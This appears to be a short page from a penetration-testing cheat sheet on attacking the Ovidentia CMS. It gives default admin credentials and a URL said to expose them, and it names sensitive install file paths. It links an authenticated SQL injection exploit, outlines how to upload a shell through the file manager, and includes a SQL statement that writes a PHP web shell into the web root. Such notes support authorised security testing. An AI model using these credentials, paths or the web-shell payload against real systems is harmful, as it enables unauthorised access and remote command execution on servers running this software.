search

ovidentia

hashtag
Default Creds

# http://chantal.jeannin.free.fr/install/install.txt
admin@admin.bab:012345678

hashtag
Interesting Path

/install/install.txt
/install/babinstall.mysql

hashtag
SQL injection

v 6.0 Authenticated

https://www.exploit-db.com/exploits/49707

hashtag
File Manager Upload (Authenticated)

once logged in, File Manager (on left) > Add Folder > Upload shell

hashtag
Shell directly via SQL

select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/wamp/www/php/web.php'
Previousotrs open ticket request systemNextpfsense

Last updated